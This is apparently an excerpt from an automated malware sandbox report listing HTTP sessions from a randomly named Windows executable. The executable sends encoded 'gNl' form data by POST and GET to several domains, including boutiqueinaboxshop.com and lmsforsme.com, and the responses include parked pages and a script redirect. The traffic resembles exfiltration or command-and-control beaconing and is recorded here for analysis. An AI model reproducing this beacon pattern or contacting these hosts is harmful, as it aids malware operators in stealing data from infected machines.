                                              Data Raw: 67 4e 6c 3d 69 37 6d 46 77 69 4b 52 4d 48 42 4f 33 67 55 49 79 5a 76 46 56 6f 4c 77 41 63 36 4d 54 4b 61 57 76 73 6a 4f 6a 39 4d 55 6a 4b 54 68 37 6e 4a 34 38 44 2b 5a 30 4d 6e 6e 78 45 45 77 6c 32 50 32 69 72 64 77 4c 72 4e 34 75 38 2f 31 7a 58 46 58 38 47 32 2b 4c 78 72 37 56 6d 63 47 4b 55 4e 49 5a 58 4d 43 6e 7a 42 39 43 57 68 4a 74 46 76 4f 68 6a 39 64 4b 32 7a 51 42 70 64 74 7a 49 50 75 6c 53 35 30 2f 2f 55 38 46 44 51 6e 6e 78 57 4b 41 49 32 79 4e 47 36 49 6e 75 2f 43 6b 75 58 48 74 6b 65 2b 4b 56 58 30 4d 70 31 7a 6d 4a 48 73 4e 37 73 77 4b 62 33 4f 4e 54 4f 48 55 42 6c 74 43 58 64 31 4b 45 47 45 7a 43 41 2b 4d 66 48 2b 4d 57 36 77 72 55 39 2b 66 46 7a 73 59 52 4b 6f 6a 4e 4e 41 73 64 64 47 64 52 65 58 38 57 30 76 74 69 62 4b 46 5a 48 70 56 79 55 6f 70 2f 6d 36 42 63 51 6f 4b 4f 79 71 56 6e 4f 69 32 63 50 33 53 73 44 76 53 78 41 37 2f 59 2b 6f 6a 6e 4a 59 6d 50 78 76 54 74 49 56 4f 4d 51 2b 51 75 56 49 77 7a 39 2b 33 59 58 37 37 72 31 31 54 37 38 75 47 32 37 5a 34 74 43 33 42 4f 45 2b 72 4f [TRUNCATED]
                                              Data Ascii: gNl=i7mFwiKRMHBO3gUIyZvFVoLwAc6MTKaWvsjOj9MUjKTh7nJ48D+Z0MnnxEEwl2P2irdwLrN4u8/1zXFX8G2+Lxr7VmcGKUNIZXMCnzB9CWhJtFvOhj9dK2zQBpdtzIPulS50//U8FDQnnxWKAI2yNG6Inu/CkuXHtke+KVX0Mp1zmJHsN7swKb3ONTOHUBltCXd1KEGEzCA+MfH+MW6wrU9+fFzsYRKojNNAsddGdReX8W0vtibKFZHpVyUop/m6BcQoKOyqVnOi2cP3SsDvSxA7/Y+ojnJYmPxvTtIVOMQ+QuVIwz9+3YX77r11T78uG27Z4tC3BOE+rO9V9ub2vidwpEcDlo92BOuz8EnZ4lFFS86VL4hOCwLZA2bUEOp9NfFOlF7kQaoCmBx/yhwGYm+BU3Tkq7fFyQb84WK9kWhmHGPRQFf6lfpTMB5HVpCZdAWrz+t4+FOJQ5dT+usYpG5tLczkakJUTnGxSwICQbX2s1GIGPkRW6scukDTuc2kktX018/ruFC7S9CiXE1i4e3lZ9Vsgzx+t7JExzv70PPMLsO7grmUMGNFgbqzFjN/WFHmuBHGgQ+giLzOd39LyzQCY7wWVMrRUnbvFfu9Jjmh+AMjtselUTZlaIGOi+J3hpPePe0og548cpcTRzyh9NO4erRPpQPQabtgY0m8tu2MQe1XL0O1z5XsrrKZbyQeth9U94wQz40qth0xYn0kCy2ZG96g2BZYGkC0lYihvzCn0FpXFLUs0Io1OcxXc4YrPgvGttB+war4EM3XUhQVsJ2WAMNlbBD1rNWoPWTXmZ/R7YaUY4SKH+yie8XQCEqEDWWtpVuyyz2Wzk4VdBYvRdONVvoK/tzGPKvMfHLCh3aG3YX3KUYR8uN9DCfGjGT/ECZ/Axuio/4JmTQDPsw77wOrkhUBHpDFqhZG2l7TB22H0iJlkTwk22cleNNGJizSRSAyJiTs1saGt5mqUNi+Nj7uBEuSgfYst1JbReywMM5N0wrC [TRUNCATED]
                                              Jul 8, 2024 09:33:50.375546932 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:50 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1118
                                              x-request-id: 2f18d322-f725-4ec0-b8c3-f9779a426067
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==
                                              set-cookie: parking_session=2f18d322-f725-4ec0-b8c3-f9779a426067; expires=Mon, 08 Jul 2024 07:48:50 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 69 68 54 2f 50 72 4f 39 52 70 72 4c 2f 33 6f 30 52 31 4e 70 52 59 6d 74 6b 50 64 46 31 71 75 72 6a 6e 67 43 46 46 4c 7a 68 6a 74 7a 65 6d 39 2f 46 76 77 62 32 72 65 78 6e 48 4d 70 75 58 66 33 66 53 73 79 4a 6b 37 4b 2f 54 45 38 31 45 4c 72 33 47 54 49 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UihT/PrO9RprL/3o0R1NpRYmtkPdF1qurjngCFFLzhjtzem9/Fvwb2rexnHMpuXf3fSsyJk7K/TE81ELr3GTIg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:50.375857115 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmYxOGQzMjItZjcyNS00ZWMwLWI4YzMtZjk3NzlhNDI2MDY3IiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449745199.59.243.226805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:52.446778059 CEST452OUTGET /v6z4/?gNl=v5OlzSyVHRQHkR8SzJ3gVKTFGeiNQ9a3rPHOxN5wltqCxit6zhqg4pXFuWsKngfZsZtYBOZhxp3bwCRN51e7LBPhb0MuJX9gMhQmuGphOmN3xULrqSpMXE0=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.orthonow.live
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:33:52.943339109 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 08 Jul 2024 07:33:52 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1438
                                              x-request-id: a9685843-da1f-4032-8db6-64ac5ebe70db
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pgroo1Rskp5MNvxA00ab+0ayved/gjvmfYXzEzYSqFdv40wo8ZRWArWwguHa2M/bCZ925sVMYkO8ZyqhBhd07w==
                                              set-cookie: parking_session=a9685843-da1f-4032-8db6-64ac5ebe70db; expires=Mon, 08 Jul 2024 07:48:52 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 67 72 6f 6f 31 52 73 6b 70 35 4d 4e 76 78 41 30 30 61 62 2b 30 61 79 76 65 64 2f 67 6a 76 6d 66 59 58 7a 45 7a 59 53 71 46 64 76 34 30 77 6f 38 5a 52 57 41 72 57 77 67 75 48 61 32 4d 2f 62 43 5a 39 32 35 73 56 4d 59 6b 4f 38 5a 79 71 68 42 68 64 30 37 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pgroo1Rskp5MNvxA00ab+0ayved/gjvmfYXzEzYSqFdv40wo8ZRWArWwguHa2M/bCZ925sVMYkO8ZyqhBhd07w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 8, 2024 09:33:52.943762064 CEST891INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTk2ODU4NDMtZGExZi00MDMyLThkYjYtNjRhYzVlYmU3MGRiIiwicGFnZV90aW1lIjoxNzIwNDI0MD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.4497473.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:33:57.979538918 CEST746OUTPOST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 56 4c 64 38 6e 61 64 47 66 72 30 49 48 34 63 70 4d 73 37 61 71 38 38 71 4c 62 55 4d 72 75 6d 61 53 4f 41 38 45 65 6e 2b 46 43 66 42 58 2f 48 47 47 76 4e 50 70 75 48 69 2b 47 58 65 6c 49 64 56 4a 33 72 44 41 33 61 71 33 74 4e 41 59 68 79 6e 49 4c 48 59 37 57 30 6c 70 58 34 2f 64 31 31 66 4a 4f 37 78 67 2f 37 46 67 33 54 69 46 71 67 31 71 7a 5a 53 46 5a 55 43 45 58 73 46 61 51 72 54 4b 43 39 4f 31 79 46 37 61 56 66 74 4a 61 39 72 55 4f 74 4e 37 63 79 75 41 6e 62 41 52 57 41 41 54 73 6c 7a 4d 7a 47 35 6a 52 38 2b 72 56 32 7a 39 33 77 35 2f 69 5a 6d 6d 42 46 7a 56 34 6f 65 51 51 3d 3d
                                              Data Ascii: gNl=VLd8nadGfr0IH4cpMs7aq88qLbUMrumaSOA8Een+FCfBX/HGGvNPpuHi+GXelIdVJ3rDA3aq3tNAYhynILHY7W0lpX4/d11fJO7xg/7Fg3TiFqg1qzZSFZUCEXsFaQrTKC9O1yF7aVftJa9rUOtN7cyuAnbARWAATslzMzG5jR8+rV2z93w5/iZmmBFzV4oeQQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.4497483.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:00.509536028 CEST766OUTPOST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 56 4c 64 38 6e 61 64 47 66 72 30 49 48 62 55 70 50 4d 48 61 72 63 38 72 45 37 55 4d 77 65 6d 57 53 4f 4d 38 45 66 7a 49 46 78 37 42 4f 66 33 47 48 75 4e 50 75 75 48 69 78 6d 58 66 34 34 64 65 4a 32 58 4c 41 32 6d 71 33 74 4a 41 59 67 75 6e 4c 34 76 66 30 6d 30 37 69 33 34 35 54 56 31 66 4a 4f 37 78 67 37 72 6a 67 33 4c 69 47 5a 6f 31 73 51 42 4e 61 70 55 4e 51 48 73 46 65 51 72 70 4b 43 39 67 31 7a 5a 46 61 54 62 74 4a 62 68 72 54 66 74 43 77 63 79 73 4f 48 61 50 64 6b 78 46 56 4d 31 37 54 53 6d 37 67 6c 77 75 75 54 6e 70 73 47 52 75 74 69 39 56 37 47 4d 48 59 37 56 58 4c 58 56 48 62 76 43 36 36 69 36 77 2f 49 36 6b 69 78 32 70 51 32 6f 3d
                                              Data Ascii: gNl=VLd8nadGfr0IHbUpPMHarc8rE7UMwemWSOM8EfzIFx7BOf3GHuNPuuHixmXf44deJ2XLA2mq3tJAYgunL4vf0m07i345TV1fJO7xg7rjg3LiGZo1sQBNapUNQHsFeQrpKC9g1zZFaTbtJbhrTftCwcysOHaPdkxFVM17TSm7glwuuTnpsGRuti9V7GMHY7VXLXVHbvC66i6w/I6kix2pQ2o=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.4497493.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:03.041343927 CEST10848OUTPOST /3c39/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              Origin: http://www.boutiqueinaboxshop.com
                                              Referer: http://www.boutiqueinaboxshop.com/3c39/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 56 4c 64 38 6e 61 64 47 66 72 30 49 48 62 55 70 50 4d 48 61 72 63 38 72 45 37 55 4d 77 65 6d 57 53 4f 4d 38 45 66 7a 49 46 78 7a 42 4f 4d 50 47 48 4a 35 50 76 75 48 69 38 47 58 61 34 34 64 35 4a 32 50 50 41 32 71 36 33 72 56 41 5a 43 6d 6e 66 5a 76 66 6a 32 30 37 74 58 34 34 64 31 31 77 4a 4f 72 39 67 2f 33 6a 67 33 4c 69 47 65 59 31 73 44 5a 4e 63 70 55 43 45 58 73 5a 61 51 71 6e 4b 43 31 57 31 7a 74 56 61 6a 37 74 4a 37 78 72 56 74 46 43 76 73 79 79 4a 48 62 51 64 6b 39 4f 56 4e 59 41 54 53 53 56 67 69 34 75 76 6d 57 4d 77 48 70 52 70 6b 73 50 70 68 38 62 5a 4a 6c 4e 50 55 56 44 64 39 4b 32 74 44 4b 43 31 4b 6e 39 39 43 79 68 47 42 37 67 5a 62 70 70 67 50 31 5a 46 34 52 39 37 57 36 5a 53 45 65 75 75 7a 42 2b 30 58 4e 74 38 41 71 43 74 72 46 54 6b 33 65 52 4b 70 4f 34 58 49 55 62 71 66 43 59 62 69 78 46 67 67 2b 71 35 56 74 38 47 6d 51 4d 64 64 66 45 41 52 75 6a 4a 51 42 4d 75 4f 34 70 56 61 73 5a 51 76 4a 38 76 71 76 5a 74 33 69 6e 69 63 33 7a 66 52 33 6c 30 71 4b 42 70 2b 5a 4b 73 62 [TRUNCATED]
                                              Data Ascii: gNl=VLd8nadGfr0IHbUpPMHarc8rE7UMwemWSOM8EfzIFxzBOMPGHJ5PvuHi8GXa44d5J2PPA2q63rVAZCmnfZvfj207tX44d11wJOr9g/3jg3LiGeY1sDZNcpUCEXsZaQqnKC1W1ztVaj7tJ7xrVtFCvsyyJHbQdk9OVNYATSSVgi4uvmWMwHpRpksPph8bZJlNPUVDd9K2tDKC1Kn99CyhGB7gZbppgP1ZF4R97W6ZSEeuuzB+0XNt8AqCtrFTk3eRKpO4XIUbqfCYbixFgg+q5Vt8GmQMddfEARujJQBMuO4pVasZQvJ8vqvZt3inic3zfR3l0qKBp+ZKsbnmzlYmGnsuLTN19pxEcfVOcVDrAqc4gJkc6+yoadqvLTh7ecQl/DY4DNcom5VENRal5OZvIKJmGWuFUXUAkUkl2s0AmtY/yVNRAFWwA2gkQWBgbI0LtPon/nIuhwaLJL4UOFDjQHQ7nmKY7n2c8MVUXQRLcp+et9mkHda3jhtt3SbWydbNEuPGUxlu8cSLPu/i6vaKdLcoEUt+fJqnPMY/RD8WimsEQPeOwSt8lHSxx/MvjjzmIPZiHJMw96Xm8xbp5oAf+2Zh/AIKkIoaUUUPb4UVsCWnrGKYdPLlna2LBJHxWWmIuesfBgoBcnUHkJ1QI/VhiU9bsZF6n6QPwnDCLeXfT6vWwdNV5Og6kR5bwOP6UbD5iosnEzyZds1A8Xo5mojgbQ+SXpP36yhlAQX6dc1MjHsHgv+KQJqRgRWt9sn1fX6DrDybCVYv7bbZephp8qJ1luOu60Mw1OZLByje+Sg/i3XeTPoTeRZKiJQB9WIgTOWYTOtN7NZw1+wy8KiLSGAxTNTGm8CD3Rfzhb55fWNsnljkKlhNBePyYP6yhtbUI2otAIIxkbx67q0EeIV3yH6hmWW+wPwCxpzNjgdpb6OHJEHuY0UzzcZMHX1tdL1XrgIEqTwRx+VnVG22fghyA5WQ9DLKJqfjOgtWSva4StdKhNjk49Kx [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.4497503.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:05.572886944 CEST461OUTGET /3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.boutiqueinaboxshop.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:34:13.033412933 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 64 43 3d 41 46 4d 68 35 4e 26 67 4e 6c 3d 59 4a 31 63 6b 73 31 53 59 4b 30 47 5a 71 34 32 4a 4d 4b 6f 73 4d 78 71 44 37 6c 36 39 2b 6d 2f 4e 65 5a 68 52 38 7a 38 42 42 69 44 64 2b 58 32 43 76 39 73 75 2b 44 58 77 46 50 61 67 66 74 56 4c 6c 50 68 4a 51 61 35 35 4f 4e 38 66 46 4b 72 4d 62 44 35 78 79 34 47 75 47 67 2f 64 31 6c 74 51 59 2f 55 76 4b 2f 41 67 46 62 37 4c 4c 77 34 6f 6a 31 66 47 35 67 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.4497513.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:18.247215033 CEST719OUTPOST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 59 31 4f 69 50 4b 7a 4b 44 31 76 2f 55 39 51 6c 34 61 46 53 74 57 6b 75 71 50 6a 48 5a 6f 65 73 51 59 6e 55 48 41 78 73 77 74 66 49 59 51 53 47 4a 45 4f 4f 77 34 64 78 79 2b 53 4f 7a 56 70 65 71 47 63 51 78 77 65 53 6a 4a 39 6d 34 53 59 72 6c 30 43 46 42 43 7a 35 45 50 75 72 6c 6a 4b 70 4c 63 70 74 38 47 45 6a 4a 35 49 6c 53 34 44 32 65 41 4e 6e 6e 34 4d 58 6a 49 64 52 6c 51 33 47 34 32 56 2b 58 31 43 70 6b 72 43 32 2b 58 58 44 2b 41 66 38 30 7a 77 5a 71 58 70 6b 34 31 77 6a 46 35 65 70 65 70 46 75 4e 46 61 49 46 55 4f 36 5a 49 4c 4e 30 44 61 45 42 59 32 55 37 52 34 36 58 67 3d 3d
                                              Data Ascii: gNl=Y1OiPKzKD1v/U9Ql4aFStWkuqPjHZoesQYnUHAxswtfIYQSGJEOOw4dxy+SOzVpeqGcQxweSjJ9m4SYrl0CFBCz5EPurljKpLcpt8GEjJ5IlS4D2eANnn4MXjIdRlQ3G42V+X1CpkrC2+XXD+Af80zwZqXpk41wjF5epepFuNFaIFUO6ZILN0DaEBY2U7R46Xg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.4497523.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:20.774857044 CEST739OUTPOST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 59 31 4f 69 50 4b 7a 4b 44 31 76 2f 55 64 4d 6c 36 35 39 53 72 32 6b 70 32 2f 6a 48 4f 34 65 6f 51 59 72 55 48 42 45 70 77 5a 7a 49 59 79 36 47 49 41 69 4f 67 6f 64 78 35 65 54 4b 33 56 70 58 71 47 52 6c 78 79 4b 53 6a 4a 35 6d 34 58 6b 72 6c 48 61 47 54 69 7a 37 49 76 75 70 72 44 4b 70 4c 63 70 74 38 48 67 5a 4a 35 77 6c 54 4c 62 32 65 68 4d 78 34 49 4d 59 67 49 64 52 7a 67 33 4b 34 32 56 6d 58 33 6e 47 6b 76 79 32 2b 58 6e 44 77 30 44 2f 39 7a 77 58 6b 33 6f 6e 33 6c 31 30 64 63 6a 38 51 72 30 41 54 58 57 79 41 53 66 67 49 35 71 61 6d 44 2b 33 63 66 2f 67 32 53 46 7a 4d 73 50 33 79 6a 69 5a 2f 54 50 70 33 57 52 69 4e 58 66 74 2f 50 63 3d
                                              Data Ascii: gNl=Y1OiPKzKD1v/UdMl659Sr2kp2/jHO4eoQYrUHBEpwZzIYy6GIAiOgodx5eTK3VpXqGRlxyKSjJ5m4XkrlHaGTiz7IvuprDKpLcpt8HgZJ5wlTLb2ehMx4IMYgIdRzg3K42VmX3nGkvy2+XnDw0D/9zwXk3on3l10dcj8Qr0ATXWyASfgI5qamD+3cf/g2SFzMsP3yjiZ/TPp3WRiNXft/Pc=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.4497533.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
